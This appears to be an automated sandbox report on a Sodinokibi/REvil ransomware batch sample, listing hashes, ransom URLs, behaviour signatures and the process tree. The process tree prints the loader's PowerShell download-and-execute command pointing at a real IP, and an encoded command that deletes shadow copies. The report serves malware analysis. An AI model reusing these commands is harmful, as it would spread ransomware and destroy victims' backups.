Analysis
-
max time kernel
34s -
max time network
35s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
23-05-2020 16:10
Static task
static1
Behavioral task
behavioral1
Sample
aa924bdd41c78914cf9c258c5b04d440.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
aa924bdd41c78914cf9c258c5b04d440.bat
Resource
win10v200430
General
-
Target
aa924bdd41c78914cf9c258c5b04d440.bat
-
Size
217B
-
MD5
73b18c7ea72367714adfa391d407d44b
-
SHA1
936cfb5cb7073a9e298eed93720a1e73b88b50b8
-
SHA256
efb6eff4932c6a31030f3eff665d0228d063c0fc37fb274278e9ceb7e55f2fe8
-
SHA512
60a9438888dc461e3c90e4df597bbe9420c700f1df7a62ede10b1e44a595336c948b4ec520a4589bc1f2f542d5c6e1b3388f55fead8501b40d843f3dbe3d3c98
Malware Config
Extracted
http://185.103.242.78/pastes/aa924bdd41c78914cf9c258c5b04d440
Extracted
C:\62mfmn-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5B24DC294A8BCFD9
http://decryptor.cc/5B24DC294A8BCFD9
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1052 wrote to memory of 1312 1052 cmd.exe powershell.exe PID 1312 wrote to memory of 784 1312 powershell.exe powershell.exe PID 1312 wrote to memory of 784 1312 powershell.exe powershell.exe PID 1312 wrote to memory of 784 1312 powershell.exe powershell.exe PID 1312 wrote to memory of 784 1312 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1312 powershell.exe Token: SeDebugPrivilege 1312 powershell.exe Token: SeDebugPrivilege 784 powershell.exe Token: SeBackupPrivilege 1780 vssvc.exe Token: SeRestorePrivilege 1780 vssvc.exe Token: SeAuditPrivilege 1780 vssvc.exe Token: SeTakeOwnershipPrivilege 1312 powershell.exe -
Suspicious behavior: EnumeratesProcesses 77 IoCs
Processes:
powershell.exepowershell.exepid process 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 784 powershell.exe 784 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe 1312 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 1312 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Drops file in Program Files directory 30 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\PopExit.mpe powershell.exe File opened for modification \??\c:\program files\SplitPublish.docx powershell.exe File opened for modification \??\c:\program files\StartInvoke.ini powershell.exe File opened for modification \??\c:\program files\WriteSplit.doc powershell.exe File opened for modification \??\c:\program files\GroupSelect.MTS powershell.exe File opened for modification \??\c:\program files\ConvertCheckpoint.wps powershell.exe File opened for modification \??\c:\program files\PingImport.svgz powershell.exe File opened for modification \??\c:\program files\SubmitStep.mpeg powershell.exe File created \??\c:\program files (x86)\62mfmn-readme.txt powershell.exe File opened for modification \??\c:\program files\CopyClear.php powershell.exe File opened for modification \??\c:\program files\EnableUse.mpg powershell.exe File opened for modification \??\c:\program files\SuspendSet.fon powershell.exe File opened for modification \??\c:\program files\CloseUnlock.i64 powershell.exe File opened for modification \??\c:\program files\PingComplete.xht powershell.exe File opened for modification \??\c:\program files\SubmitConnect.mp2v powershell.exe File opened for modification \??\c:\program files\SubmitPop.au3 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\62mfmn-readme.txt powershell.exe File opened for modification \??\c:\program files\RegisterResume.m3u powershell.exe File opened for modification \??\c:\program files\ResetSync.emz powershell.exe File created \??\c:\program files\62mfmn-readme.txt powershell.exe File opened for modification \??\c:\program files\MeasureUnblock.vb powershell.exe File opened for modification \??\c:\program files\RedoMove.jpeg powershell.exe File opened for modification \??\c:\program files\UpdateUninstall.wm powershell.exe File opened for modification \??\c:\program files\WaitResolve.jpg powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\62mfmn-readme.txt powershell.exe File opened for modification \??\c:\program files\DisableResize.mov powershell.exe File opened for modification \??\c:\program files\WriteCopy.7z powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\62mfmn-readme.txt powershell.exe File opened for modification \??\c:\program files\UninstallEnable.xlsb powershell.exe File opened for modification \??\c:\program files\RestoreMeasure.vst powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7j946621.bmp" powershell.exe -
Enumerates connected drives 3 TTPs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1312 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\aa924bdd41c78914cf9c258c5b04d440.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/aa924bdd41c78914cf9c258c5b04d440');Invoke-JYKVBWWUMA;Start-Sleep -s 10000"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1312 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:784
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1780